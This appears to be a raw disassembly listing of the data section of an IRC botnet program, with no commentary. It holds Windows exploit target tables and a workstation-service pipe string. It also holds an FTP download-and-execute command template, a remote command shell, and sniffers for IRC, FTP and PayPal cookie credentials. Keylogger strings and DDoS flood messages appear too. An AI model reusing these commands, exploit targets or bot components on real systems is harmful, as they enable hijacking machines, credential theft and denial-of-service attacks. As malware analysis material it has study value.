aWindowsUk2k3_9 db 'Windows uk 2k3 ee sp0 14',0
align 4
aWindowsUk2k_10 db 'Windows uk 2k3 ee sp0 13',0
align 4
aWindowsUk2k_11 db 'Windows uk 2k3 ee sp0 12',0
align 10h
aWindowsUk2k_12 db 'Windows uk 2k3 ee sp0 11',0
align 4
aWindowsUk2k_13 db 'Windows uk 2k3 ee sp0 10',0
align 4
aWindowsUk2k_14 db 'Windows uk 2k3 ee sp0 9',0
aWindowsUk2k_15 db 'Windows uk 2k3 ee sp0 8',0
aWindowsUk2k_16 db 'Windows uk 2k3 ee sp0 7',0
aWindowsUk2k_17 db 'Windows uk 2k3 ee sp0 6',0
aWindowsUk2k_18 db 'Windows uk 2k3 ee sp0 5',0
aWindowsUk2k_19 db 'Windows uk 2k3 ee sp0 4',0
aWindowsUk2k_20 db 'Windows uk 2k3 ee sp0 3',0
aWindowsUk2k_21 db 'Windows uk 2k3 ee sp0 2',0
aWindowsUk2k_22 db 'Windows uk 2k3 ee sp0 1',0
aWindowsUk2k3Se db 'Windows uk 2k3 se sp0 24',0
align 4
aWindowsUk2k_23 db 'Windows uk 2k3 se sp0 23',0
align 4
aWindowsUk2k_24 db 'Windows uk 2k3 se sp0 22',0
align 4
aWindowsUk2k_25 db 'Windows uk 2k3 se sp0 21',0
align 10h
aWindowsUk2k_26 db 'Windows uk 2k3 se sp0 20',0
align 4
aWindowsUk2k_27 db 'Windows uk 2k3 se sp0 19',0
align 4
aWindowsUk2k_28 db 'Windows uk 2k3 se sp0 18',0
align 4
aWindowsUk2k_29 db 'Windows uk 2k3 se sp0 17',0
align 10h
aWindowsUk2k_30 db 'Windows uk 2k3 se sp0 16',0
align 4
aWindowsUk2k_31 db 'Windows uk 2k3 se sp0 15',0
align 4
aWindowsUk2k_32 db 'Windows uk 2k3 se sp0 14',0
align 4
aWindowsUk2k_33 db 'Windows uk 2k3 se sp0 13',0
align 10h
aWindowsUk2k_34 db 'Windows uk 2k3 se sp0 12',0
align 4
aWindowsUk2k_35 db 'Windows uk 2k3 se sp0 11',0
align 4
aWindowsUk2k_36 db 'Windows uk 2k3 se sp0 10',0
align 4
aWindowsUk2k_37 db 'Windows uk 2k3 se sp0 9',0
aWindowsUk2k_38 db 'Windows uk 2k3 se sp0 8',0
aWindowsUk2k_39 db 'Windows uk 2k3 se sp0 7',0
aWindowsUk2k_40 db 'Windows uk 2k3 se sp0 6',0
aWindowsUk2k_41 db 'Windows uk 2k3 se sp0 5',0
aWindowsUk2k_42 db 'Windows uk 2k3 se sp0 4',0
aWindowsUk2k_43 db 'Windows uk 2k3 se sp0 3',0
aWindowsUk2k_44 db 'Windows uk 2k3 se sp0 2',0
aWindowsUk2k_45 db 'Windows uk 2k3 se sp0 1',0
aWindowsUkXpPro db 'Windows uk xp pro sp1 25',0
align 4
aWindowsUkXpP_0 db 'Windows uk xp pro sp1 24',0
align 4
aWindowsUkXpP_1 db 'Windows uk xp pro sp1 23',0
align 10h
aWindowsUkXpP_2 db 'Windows uk xp pro sp1 22',0
align 4
aWindowsUkXpP_3 db 'Windows uk xp pro sp1 21',0
align 4
aWindowsUkXpP_4 db 'Windows uk xp pro sp1 20',0
align 4
aWindowsUkXpP_5 db 'Windows uk xp pro sp1 19',0
align 10h
aWindowsUkXpP_6 db 'Windows uk xp pro sp1 18',0
align 4
aWindowsUkXpP_7 db 'Windows uk xp pro sp1 17',0
align 4
aWindowsUkXpP_8 db 'Windows uk xp pro sp1 16',0
align 4
aWindowsUkXpP_9 db 'Windows uk xp pro sp1 15',0
align 10h
aWindowsUkXp_10 db 'Windows uk xp pro sp1 14',0
align 4
aWindowsUkXp_11 db 'Windows uk xp pro sp1 13',0
align 4
aWindowsUkXp_12 db 'Windows uk xp pro sp1 12',0
align 4
aWindowsUkXp_13 db 'Windows uk xp pro sp1 11',0
align 10h
aWindowsUkXp_14 db 'Windows uk xp pro sp1 10',0
align 4
aWindowsUkXp_15 db 'Windows uk xp pro sp1 9',0
aWindowsUkXp_16 db 'Windows uk xp pro sp1 8',0
aWindowsUkXp_17 db 'Windows uk xp pro sp1 7',0
aWindowsUkXp_18 db 'Windows uk xp pro sp1 6',0
aWindowsUkXp_19 db 'Windows uk xp pro sp1 5',0
aWindowsUkXp_20 db 'Windows uk xp pro sp1 4',0
aWindowsUkXp_21 db 'Windows uk xp pro sp1 3',0
aWindowsUkXp_22 db 'Windows uk xp pro sp1 2',0
aWindowsUkXp_23 db 'Windows uk xp pro sp1 1',0 ; DATA XREF: seg002:004415A8�o
aWindows2000Sp4 db 'Windows 2000 SP4 GER FAT32',0
align 10h
aWindowsNlSp123 db 'Windows nl sp1 23',0
align 4
aWindowsNlSp122 db 'Windows nl sp1 22',0
align 4
aWindowsNlSp121 db 'Windows nl sp1 21',0
align 4
aWindowsNlSp120 db 'Windows nl sp1 20',0
align 10h
aWindowsNlSp119 db 'Windows nl sp1 19',0
align 4
aWindowsNlSp118 db 'Windows nl sp1 18',0
align 4
aWindowsNlSp117 db 'Windows nl sp1 17',0
align 4
aWindowsNlSp116 db 'Windows nl sp1 16',0
align 10h
aWindowsNlSp115 db 'Windows nl sp1 15',0
align 4
aWindowsNlSp114 db 'Windows nl sp1 14',0
align 4
aWindowsNlSp113 db 'Windows nl sp1 13',0
align 4
aWindowsNlSp112 db 'Windows nl sp1 12',0
align 10h
aWindowsNlSp111 db 'Windows nl sp1 11',0
align 4
aWindowsNlSp110 db 'Windows nl sp1 10',0
align 4
aWindowsNlSp19 db 'Windows nl sp1 9',0
align 4
aWindowsNlSp18 db 'Windows nl sp1 8',0
align 10h
aWindowsNlSp17 db 'Windows nl sp1 7',0
align 4
aWindowsNlSp16 db 'Windows nl sp1 6',0
align 4
aWindowsNlSp15 db 'Windows nl sp1 5',0
align 4
aWindowsNlSp14 db 'Windows nl sp1 4',0
align 10h
aWindowsNlSp13 db 'Windows nl sp1 3',0
align 4
aWindowsNlSp12 db 'Windows nl sp1 2',0
align 4
aWindowsNlSp11 db 'Windows nl sp1 1',0
align 4
aWindowsXpSp01E db 'Windows XP SP0+1 ENG',0 ; DATA XREF: seg002:00441418�o
align 4
aWindowsXpSp01G db 'Windows XP SP0+1 GER+NL+IT+FR',0
align 4
dword_433DB4 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: seg000:0041118D�o
dword_433DC8 dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: seg000:00411143�o
aSPipeWkssvc db '\\%s\pipe\wkssvc',0 ; DATA XREF: seg000:004110EC�o
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: seg000:00411682�o
; sub_41C9D4+1F�o
aEchoOpenSDOE_1 db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
dd 234032Dh, 6E6E6F63h, 62746365h, 26B6361h, 43202D03h
dd 6E65696Ch, 6F632074h, 63656E6Eh, 6E6F6974h, 6F726620h
dd 5049206Dh, 7325203Ah, 2E64253Ah, 0
dd 234032Dh, 6E6E6F63h, 62746365h, 26B6361h, 45202D03h
dd 726F7272h, 6962203Ah, 2928646Eh, 69616620h, 2C64656Ch
dd 74657220h, 656E7275h, 3C203A64h, 2E3E6425h, 0
dd 234032Dh, 6E6E6F63h, 62746365h, 26B6361h, 45202D03h
dd 726F7272h, 6F73203Ah, 74656B63h, 66202928h, 656C6961h
dd 72202C64h, 72757465h, 3A64656Eh, 64253C20h, 2E3Eh, 20313232h
dd 646F6F47h, 20657962h, 70706168h, 30722079h, 6E697430h
dd 0A2E67h, 20353234h, 276E6143h, 706F2074h, 64206E65h
dd 20617461h, 6E6E6F63h, 69746365h, 0A2E6E6Fh, 0
dd 234032Dh, 64707466h, 202D0203h, 746E6573h, 6C696620h
dd 6F742065h, 732520h, 20363232h, 6E617254h, 72656673h
dd 6D6F6320h, 74656C70h, 0A2E65h, 234032Dh, 64707466h
dd 202D0203h, 72617473h, 676E6974h, 61727420h, 6566736Eh
dd 6F742072h, 732520h, 20303531h, 6E65704Fh, 20676E69h
dd 414E4942h, 6D205952h, 2065646Fh, 61746164h, 6E6F6320h
dd 7463656Eh, 0A6E6F69h, 0
aRetr db 'RETR',0
align 4
a200PortCommand db '200 PORT command successful.',0Ah,0
align 4
aS_S_S_S db '%s.%s.%s.%s',0
aXX db '%x%x',0Ah,0
align 4
aS_8 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah
db ']',0
aPort db 'PORT',0
align 4
a226TransferCom db '226 Transfer complete',0Ah,0
align 10h
aList_0 db 'LIST',0
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
align 4
aPasv db 'PASV',0
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0
aI_0: ; DATA XREF: seg002:00442F58�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0
aA_0: ; DATA XREF: seg002:00442F64�o
unicode 0, <A>,0
aType db 'TYPE',0
align 4
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0
align 4
dd offset dword_445750
a350Restarting_ db '350 Restarting.',0Ah,0
align 4
aRest db 'REST',0
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0
align 4
aSyst db 'SYST',0
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0
align 4
aPass_1 db 'PASS',0
align 4
a331PasswordReq db '331 Password required',0Ah,0
align 4
aUser_2 db 'USER',0
align 4
aSS_5 db '%s %s',0
align 4
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_412135+64D�o
align 8
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+638�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_412135+61D�o
align 10h
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_412135+58E�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_412135+566�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_412135:loc_412658�o
align 10h
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_412135+51C�o
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_412135+476�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_412135+439�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_412135+406�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_412135:loc_412502�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_412135+3C6�o
align 4
aSS_3 db '%s%s/',0 ; DATA XREF: sub_412135+379�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+335�o
; sub_412135+48B�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_412135+308�o
align 4
aS_2 db '<%s>',0 ; DATA XREF: sub_412135+2DE�o
; sub_412135+418�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_412135+2B4�o
aAm db 'AM',0 ; DATA XREF: sub_412135+293�o
align 4
aPm_0 db 'PM',0 ; DATA XREF: sub_412135+288�o
align 4
a__ db '..',0 ; DATA XREF: sub_412135+231�o
align 10h
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+1BF�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_412135:loc_412276�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+12A�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 8
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_412135+F2�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_412135+AC�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 10h
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_412135+6E�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 10h
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_412135+45�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4128A1+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_41D779+17D�o
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0
align 4
aApplicationOct db 'application/octet-stream',0
align 10h
aTextHtml db 'text/html',0
align 4
unk_43484C db 2Dh ; - ; DATA XREF: seg000:00412DA6�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStartW db ' failed to start worker thread, error %d',0
align 4
unk_434884 db 2Dh ; - ; DATA XREF: seg000:00412D34�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 4
asc_4348B8: ; DATA XREF: seg000:00412C80�o
unicode 0, <*>,0
aS_9 db '\%s',0 ; DATA XREF: seg000:00412B59�o
db 2Dh ; -
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
asc_4348E8 db 0Dh,0Ah,0 ; DATA XREF: sub_41D235+E9�o
align 4
aGet_1 db 'GET ',0
align 4
dword_4348F4 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: seg000:0041339D�o
aServerFailed_0 db '- server failed, returned %d',0
align 10h
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: seg000:00413330�o
dword_434938 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: seg000:004132D8�o
aClientConnecti db '- client connection from %s:%d.',0
align 8
unk_434968 db 2Dh ; - ; DATA XREF: seg000:004135DC�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_36 db 'Failed to start connection thread, error: <%d>.',0
unk_4349A8 db 2Dh ; - ; DATA XREF: seg000:00413566�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_0 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_37 db 'Failed to start client thread, error: <%d>.',0
db 2Dh ; -
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_1 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 10h
dword_434A70 dd 234032Dh, 676F6C72h, 2646E69h, 50202D03h, 6F746F72h
; DATA XREF: seg000:loc_41382F�o
dd 206C6F63h, 69727473h, 7420676Eh, 6C206F6Fh, 2E676E6Fh
dd 0
dd 234032Dh, 676F6C72h, 2646E69h, 4C202D03h, 6E69676Fh
dd 6A657220h, 65746365h, 52202C64h, 746F6D65h, 73752065h
dd 203A7265h, 4073253Ch, 2E3E7325h, 0
dd 234032Dh, 676F6C72h, 2646E69h, 55202D03h, 20726573h
dd 67676F6Ch, 6F206465h, 203A7475h, 4073253Ch, 2E3E7325h
dd 0
dd 234032Dh, 676F6C72h, 2646E69h, 45202D03h, 726F7272h
dd 6553203Ah, 6F697373h, 6E75526Eh, 203A2928h, 3E64253Ch
dd 2Eh, 234032Dh, 676F6C72h, 2646E69h, 55202D03h, 20726573h
dd 67676F6Ch, 69206465h, 3C203A6Eh, 25407325h, 2E3E73h
dd 6D726550h, 69737369h, 64206E6Fh, 65696E65h, 0A64h, 234032Dh
dd 676F6C72h, 2646E69h, 45202D03h, 726F7272h, 6567203Ah
dd 65657074h, 6D616E72h, 3A292865h, 64253C20h, 2E3Eh, 234032Dh
dd 676F6C72h, 2646E69h, 45202D03h, 726F7272h, 6573203Ah
dd 72657672h, 69616620h, 2C64656Ch, 74657220h, 656E7275h
dd 3C203A64h, 2E3E6425h, 0
dd 234032Dh, 676F6C72h, 2646E69h, 46202D03h, 656C6961h
dd 6F742064h, 61747320h, 63207472h, 6E65696Ch, 68742074h
dd 64616572h, 7265202Ch, 3A726F72h, 64253C20h, 2E3Eh, 234032Dh
dd 676F6C72h, 2646E69h, 43202D03h, 6E65696Ch, 6F632074h
dd 63656E6Eh, 6E6F6974h, 6F726620h, 5049206Dh, 7325203Ah
dd 2C64253Ah, 72655320h, 20726576h, 65726874h, 203A6461h
dd 2E6425h, 234032Dh, 676F6C72h, 2646E69h, 52202D03h, 79646165h
dd 646E6120h, 69617720h, 676E6974h, 726F6620h, 636E6920h
dd 6E696D6Fh, 6F632067h, 63656E6Eh, 6E6F6974h, 2E73h, 234032Dh
dd 676F6C72h, 2646E69h, 46202D03h, 656C6961h, 6F742064h
dd 736E6920h, 6C6C6174h, 6E6F6320h, 6C6F7274h, 6820432Dh
dd 6C646E61h, 202C7265h, 6F727265h, 3C203A72h, 2E3E6425h
dd 0
db 2Dh ; -
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 4
unk_434CF8 db 2Dh ; - ; DATA XREF: sub_413CD4+BF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell, error: <%d>.',0
align 10h
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_413CD4+88�o
align 4
db 2Dh ; -
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
unk_434D74 db 2Dh ; - ; DATA XREF: sub_413F5A+B2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell.',0
unk_434D9C db 2Dh ; - ; DATA XREF: sub_413F5A+82�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create shell stdin pipe, error: <%d>.',0
align 10h
unk_434DE0 db 2Dh ; - ; DATA XREF: sub_413F5A+5F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create shell stdout pipe, error: <%d>.',0
unk_434E20 db 2Dh ; - ; DATA XREF: seg000:00414138�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 8
dword_434E58 dd 234032Dh, 676F6C72h, 2646E69h, 46202D03h, 656C6961h
; DATA XREF: seg000:004140AF�o
; seg000:004140E5�o
dd 6F742064h, 65726320h, 20657461h, 64616552h, 6C656853h
dd 6573206Ch, 6F697373h, 6874206Eh, 64616572h, 7265202Ch
dd 3A726F72h, 64253C20h, 2E3Eh, 234032Dh, 6B636F73h, 3023473h
dd 7245202Dh, 3A726F72h, 69614620h, 2064656Ch, 63206F74h
dd 656E6E6Fh, 74207463h, 6174206Fh, 74656772h, 6572202Ch
dd 6E727574h, 203A6465h, 3E64253Ch, 2Eh, 234032Dh, 6B636F73h
dd 3023473h, 7245202Dh, 3A726F72h, 69614620h, 2064656Ch
dd 6F206F74h, 206E6570h, 6B636F73h, 29287465h, 6572202Ch
dd 6E727574h, 203A6465h, 3E64253Ch, 2Eh, 234032Dh, 6B636F73h
dd 3023473h, 7541202Dh, 6E656874h, 61636974h, 6E6F6974h
dd 69616620h, 2E64656Ch, 6D655220h, 2065746Fh, 72657375h
dd 203A6469h, 21207325h, 7325203Dh, 2Eh, 234032Dh, 6B636F73h
dd 3023473h, 6146202Dh, 64656C69h, 206F7420h, 72617473h
dd 65732074h, 72657672h, 206E6F20h, 74726F50h, 2E642520h
dd 0
dd 234032Dh, 6B636F73h, 3023473h, 6146202Dh, 64656C69h
dd 206F7420h, 72617473h, 6C632074h, 746E6569h, 72687420h
dd 2C646165h, 72726520h, 203A726Fh, 3E64253Ch, 2Eh, 0
dd 234032Dh, 6B636F73h, 3023473h, 6C43202Dh, 746E6569h
dd 6E6F6320h, 7463656Eh, 206E6F69h, 6D6F7266h, 3A504920h
dd 3A732520h, 202C6425h, 76726553h, 74207265h, 61657268h
dd 25203A64h, 2E64h, 4000500h, 7868746Bh, 0
dd 234032Dh, 70746674h, 2D030264h, 6C696620h, 65732065h
dd 7420746Eh, 7325206Fh, 0
db 2Dh ; -
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aSendingDataPac db ' sending data packets to %s',0
db 2Dh ; -
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToOpenFi db ' Failed to open file: %s.',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aErrorSocketFai db ' Error: socket() failed, returned: <%d>.',0
align 10h
dword_4350D0 dd 234032Dh, 6C79656Bh, 302676Fh, 7325202Dh, 0 ; DATA XREF: seg000:00414BC8�o
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: seg000:00414BA2�o
align 10h
aSReturnS db '%s (Return) (%s)',0
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0
align 4
aSChangedWindow db '%s (Changed Windows: %s)',0
align 4
aHttp_0 db 'HTTP',0 ; DATA XREF: seg002:00442244�o
align 10h
aFtp db 'FTP',0 ; DATA XREF: seg002:00442240�o
off_435154 dd offset aFailedReturned ; DATA XREF: seg002:0044223C�o
; ") failed, returned %d"
dword_435158 dd 544F42h, 234032Dh, 696E7370h, 3026666h, 6572202Dh, 29287663h
; DATA XREF: seg002:00442238�o
dd 69616620h, 2C64656Ch, 74657220h, 656E7275h, 64252064h
dd 0
dd 234032Dh, 696E7370h, 3026666h, 7573202Dh, 63697073h
dd 73756F69h, 20732520h, 6B636170h, 66207465h, 3A6D6F72h
dd 3A732520h, 2D206425h, 732520h, 234032Dh, 696E7370h
dd 3026666h, 2Dh, 4E53505Bh, 5D464649h, 0
dd 234032Dh, 696E7370h, 3026666h, 5357202Dh, 636F4941h
dd 29286C74h, 69616620h, 2C64656Ch, 74657220h, 656E7275h
dd 64252064h, 0
dd 234032Dh, 696E7370h, 3026666h, 6962202Dh, 2928646Eh
dd 69616620h, 2C64656Ch, 74657220h, 656E7275h, 64252064h
dd 0
dd 234032Dh, 696E7370h, 3026666h, 6F73202Dh, 74656B63h
db 28h
aFailedReturned db ') failed, returned %d',0 ; DATA XREF: seg001:off_435154�o
align 10h
aHashin db ':!hashin',0
align 4
a_hashin db ':.hashin',0
align 4
aIdent_0 db ':!ident',0
a_ident db ':.ident',0
a_login db ':.Login',0
aLogin_0 db ':!Login',0
aLogin_1 db ':!login',0
a_login_0 db ':.login',0
a366 db '366 ',0
align 10h
a302_0 db '302 ',0
align 4
aJoin_0 db 'JOIN #',0
align 10h
aPsniff_0 db 'PSNIFF//',0
align 4
aPsniff_1 db '[PSNIFF]:',0
align 4
aBotSniff db 'Bot sniff',0
align 4
aYouAreNowAnIrc db 'You are now an IRC Operator',0
aOper db 'oper ',0
align 4
aNick_1 db 'NICK ',0
align 10h
aOper_0 db 'OPER ',0
align 4
aIrcSniff db 'IRC sniff',0
align 4
aPass_2 db 'PASS ',0
align 4
aUser_3 db 'USER ',0
align 4
a230 db '230 ',0
align 4
a220 db '220 ',0
align 4
aFtpSniff db 'FTP sniff',0
align 10h
aSetCookie db 'Set-Cookie:',0
aPaypal_com db 'paypal.com',0
align 4
aPaypal_com_0 db 'PAYPAL.COM',0
align 4
aPaypal db 'PAYPAL',0
align 4
aPaypal_0 db 'paypal',0
align 4
aHttpSniff db 'HTTP sniff',0
align 10h
aOpenssh_2 db 'OpenSSH_2',0
align 4
aServUFtpServer db 'Serv-U FTP Server',0
align 10h
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0
align 10h
aVulnSniff db 'VULN sniff',0
align 4
dd 234032Dh, 66696E73h, 2726566h, 56202D03h, 204E4C55h
dd 66696E73h, 25222066h, 64253A73h, 6F742022h, 73252220h
dd 2264253Ah, 202D203Ah, 22732522h, 0
dd 234032Dh, 66696E73h, 2726566h, 48202D03h, 20505454h
dd 66696E73h, 25222066h, 64253A73h, 6F742022h, 73252220h
dd 2264253Ah, 202D203Ah, 22732522h, 0
db 2Dh ; -
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
db 2Dh ; -
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
db 2Dh ; -
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
db 2Dh ; -
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 4
db 2Dh ; -
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
dword_435534 dd 234032Dh, 736F6464h, 202D0302h, 646E6573h, 72726520h
; DATA XREF: sub_415825+31F�o
dd 203A726Fh, 6425h
unk_435550 db 2Dh ; - ; DATA XREF: seg000:00415C33�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
unk_435578 db 2Dh ; - ; DATA XREF: seg000:00415F64�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
